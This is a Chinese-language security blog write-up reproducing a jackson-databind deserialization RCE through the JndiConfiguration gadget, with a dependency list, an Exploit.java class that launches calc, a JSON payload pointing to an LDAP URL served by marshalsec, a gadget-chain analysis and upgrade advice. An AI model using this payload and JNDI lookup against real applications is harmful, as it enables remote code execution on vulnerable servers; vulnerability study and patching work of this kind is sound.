1. 速盾网络首页
  2. 网站运维

cve漏洞库(rce漏洞)

七芒星实验室 网站运维

影响范围

  • jackson-databind before 2.9.10.4

  • jackson-databind before 2.8.11.6

  • jackson-databind before 2.7.9.7

利用条件

  • 开启enableDefaultTyping()

  • 使用了com.pastdev.httpcomponents.configuration.JndiConfiguration第三方依赖

漏洞概述

com.pastdev.httpcomponents.configuration.JndiConfiguration类绕过了之前jackson-databind维护的黑名单类,并且JDK版本较低的话,可造成RCE。

环境搭建

pom.xml文件如下:

<dependencies>    <dependency>      <groupId>com.fasterxml.jackson.core</groupId>      <artifactId>jackson-databind</artifactId>      <version>2.9.10.4</version>    </dependency>
    <!-- https://mvnrepository.com/artifact/com.pastdev.httpcomponents/configuration -->    <dependency>      <groupId>com.pastdev.httpcomponents</groupId>      <artifactId>configuration</artifactId>      <version>0.1.3</version>    </dependency>
      <dependency>      <groupId>org.slf4j</groupId>      <artifactId>slf4j-nop</artifactId>      <version>1.7.2</version>    </dependency>    <!-- https://mvnrepository.com/artifact/javax.transaction/jta -->      <dependency>          <groupId>javax.transaction</groupId>          <artifactId>jta</artifactId>          <version>1.1</version>      </dependency>  </dependencies>

漏洞复现

这里使用LDAP的利用方式进行漏洞的利用演示,RMI的方式也是类似的,且RMI比LDAP要对JDK版本有很大的局限性~
LDAP利用方式:jdk版本:JDK 11.0.1、8u191、7u201、6u211之前,笔者这里采用JDK 1.8.0_181

编译Exploit.java

Exploit.java代码如下:

import java.lang.Runtime;
public class Exploit {    static {        try {            Runtime.getRuntime().exec(\\\"calc\\\");        } catch (Exception e) {            e.printStackTrace();        }    }}

编译Exploit.java文件:

之后在本地搭建HTTP服务并将Exploit.class放置在web目录下,之后通过marshalsec来启动一个LDAP服务 使用marshalsec来启动一个LDAP服务:

cve漏洞库(rce漏洞)

执行漏洞POC 

Poc.java代码如下所示:

package com.jacksonTest;
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;
public class Poc {    public static void main(String[] args) throws Exception {        ObjectMapper mapper = new ObjectMapper();        mapper.enableDefaultTyping();        String payload = \\\"[\\\\\\\"com.pastdev.httpcomponents.configuration.JndiConfiguration\\\\\\\",\\\\\\\"ldap://127.0.0.1:1099/Exploit\\\\\\\"]\\\";        try {            mapper.readValue(payload, Object.class);        } catch (IOException e) {            e.printStackTrace();        }    }}

之后运行该程序,成功执行命令,弹出计算器:

cve漏洞库(rce漏洞)

漏洞分析 通过查看issue编号可以查看到对应添加到黑名单中的相关类:

https://github.com/FasterXML/jackson-databind/issues/2798

cve漏洞库(rce漏洞)

相关类确定:
https://github.com/kishorkunal-raj/jackson-databind/blob/5f4148e6c083529a2d12c6dc986b07a03850f503/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java#L198

之后在源代码中定位到com.pastdev.httpcomponents.configuration.JndiConfiguration类,发现一处可疑的JNDI注入,我们只需要构造参数即可实现,非常简单:

整个利用链如下所示:

    mapper.readValue    ->JndiConfiguration        ->lookup

    安全建议

    • 及时将jackson-databind升级到安全版本

    • 升级到较高版本的JDK

    原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34246.html

    (0)
    七芒星实验室's avatar七芒星实验室
    0 0
    上一篇 2024年4月20日 上午11:43
    下一篇 2024年4月20日 上午11:45

    相关推荐

    发表回复

    您的邮箱地址不会被公开。 必填项已用 * 标注